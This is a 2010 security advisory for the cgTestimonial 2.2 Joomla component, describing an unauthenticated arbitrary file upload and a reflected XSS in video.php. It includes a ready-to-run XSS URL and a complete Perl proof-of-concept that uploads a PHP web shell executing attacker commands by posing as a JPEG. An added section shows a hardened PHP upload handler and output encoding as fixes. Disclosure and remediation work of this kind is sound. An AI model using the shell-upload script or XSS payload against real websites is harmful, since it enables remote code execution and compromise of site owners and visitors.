
Joomla Component cgTestimonial 2.2 Multiple Remote Vulnerabilities

Posted on 06 August 2010

==================================================================
Joomla Component cgTestimonial 2.2 Multiple Remote Vulnerabilities
==================================================================

cgTestimonial 2.2 Joomla Component Multiple Remote Vulnerabilities

Name              cgTestimonial
Vendor            http://www.cmsgalaxy.com
Versions Affected 2.2

Author            Salvatore Fresta aka Drosophila
Website           http://www.salvatorefresta.net
Contact           salvatorefresta [at] gmail [dot] com

Date              2010-08-06

X. INDEX

I.   ABOUT THE APPLICATION
II.  DESCRIPTION
III. ANALYSIS
IV.  SAMPLE CODE
V.   FIX

I. ABOUT THE APPLICATION
________________________

cgTestimonial is a Joomla component for adding testimonials from the
frontend (submitted by site users) and for managing and publishing them
from the backend. It lets a site visitor submit a testimonial form with
several fields on one of the site's pages, and allows testimonials to be
added either by users or by the administrator.

II. DESCRIPTION
_______________

Some parameters are not properly sanitised. The following vulnerabilities
can be exploited by guest (unauthenticated) users.

III. ANALYSIS
_____________

Summary:

 A) Multiple Arbitrary File Upload
 B) XSS

A) Multiple Arbitrary File Upload
_________________________________

The usr_img parameter in cgtestimonial.php (frontend) and in
testimonial.php (admin, where no check is performed at all) is not
properly sanitised. On the frontend the only check is on the Content-Type
field of the uploaded part, a value chosen by the client, so a PHP file
declared as image/jpeg is accepted.

B) XSS
______

The url parameter in video.php is not properly sanitised before being
printed on screen.

IV. SAMPLE CODE
_______________

A) Multiple Arbitrary File Upload

http://poc.salvatorefresta.net/PoC-cgTestimonial2.2.pl.txt

B) XSS

http://site/path/components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>

V. FIX
______

No fix.

################################
PoC-cgTestimonial2.2.pl
################################

#!/usr/bin/perl
#
# PoC - Remote PHP Shell Upload - cgTestimonial 2.2 Joomla Component
#
# Author: Salvatore Fresta aka Drosophila
# Email:  salvatorefresta@gmail.com
#
# Date: 06 August 2010
#
# http://target/path/components/com_cgtestimonial/user_images/filename?cmd=command
#

use IO::Socket;

$usage = "\ncgTestimonial 2.2 Remote PHP Shell Upload - (c) Salvatore Fresta\n".
         "http://www.salvatorefresta.net\n\n".
         "Usage: perl PoC-cgTestimonial.pl <hostname> <path>\n\n";

$#ARGV == 1 || die $usage;

my $host = $ARGV[0];
my $path = $ARGV[1];
my $stop = 0;
my $rand = "master".int(rand 150);
# PHP payload carried in the multipart body; the component stores it unchanged
my $shell = "<?php echo \"<pre>\"; system(\$_GET['cmd']); echo \"</pre>\"; ?>";
my $filename = "evil.php";

# multipart/form-data body; the part's Content-Type is the only thing the
# frontend checks, so it is simply declared as image/jpeg
my $code = "--AaB03x\r\n".
           "Content-Disposition: form-data; name=\"usr_img\"; filename=\"$filename\"\r\n".
           "Content-Type: image/jpeg\r\n".
           "\r\n".
           "$shell\r\n".
           "--AaB03x--";

my $pkg = "POST ".$path."index.php?option=com_cgtestimonial&task=submit HTTP/1.1\r\n".
          "Host: $host\r\n".
          "Content-Type: multipart/form-data; boundary=AaB03x\r\n".
          "Content-Length: ".length($code)."\r\n".
          "\r\n".
          $code;

my $socket = new IO::Socket::INET(
    Proto    => "tcp",
    PeerAddr => $host,
    PeerPort => "80"
) or die "\n[-] Unable to connect to $host\n";

print "\n[+] Connected\n";

print $socket $pkg;

$pkg = "GET ".$path."components/com_cgtestimonial/user_images/".$filename." HTTP/1.1\r\n".
       "Host: $host\r\n\r\n";

print $socket $pkg;

# the published version used "!=~", which is not a Perl operator; "!~" is what was meant
while ((my $rec = <$socket>) && $stop != 1) {
    if($rec !~ /302 Found/) {
        $stop = 1;
    }
}

if($stop != 1) {
    print "[-] Shell not uploaded\n";
    close($socket);
    exit;
}

print "[+] Shell uploaded on ".$host.$path."components/com_cgtestimonial/user_images/".$filename."\n".
      "[+] Disconnected\n";

close($socket);

# http://inj3ct0r.com/ [2010-08-06]
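As an added example that is not part of the advisory or of the cgTestimonial code: the weak check the analysis describes (trusting the client-supplied Content-Type of the usr_img part) beside a hardened upload handler, and an encoder for the url parameter that video.php prints. The function names, $upload_dir and the allowed-type map are assumptions.

```php
<?php
// Added example (not cgTestimonial code): the weak pattern the advisory
// describes, which trusts the Content-Type the client sent for the usr_img
// part. The PoC simply declares image/jpeg for a .php file.
function weak_upload_check(array $file): bool
{
    return $file['type'] === 'image/jpeg';   // client-controlled value
}

// Hardened handler (assumed names; $upload_dir is where testimonial images
// live). Every decision is made on the bytes on disk, never on headers or
// on the user-chosen filename.
function hardened_upload(array $file, string $upload_dir): ?string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // 1. Sniff the real type from content and map it to an extension from a
    //    fixed allow-list; PHP source never gets past this step.
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset($allowed[$mime])) {
        return null;
    }
    // 2. Second opinion from the image decoder.
    if (getimagesize($file['tmp_name']) === false) {
        return null;
    }
    // 3. Never reuse the client filename (the PoC sends "evil.php").
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = rtrim($upload_dir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0644);
    return $name;
}

// The video.php bug: the url parameter is echoed raw. Accept only http(s)
// URLs and encode for HTML context, so "><script> is rendered as text.
function safe_video_url(string $url): string
{
    if (!preg_match('#\Ahttps?://#i', $url)) {
        return '';
    }
    return htmlspecialchars($url, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}
```

Independently of the code, the user_images directory the PoC fetches from should be served with script execution disabled, so that nothing stored there is ever interpreted by PHP.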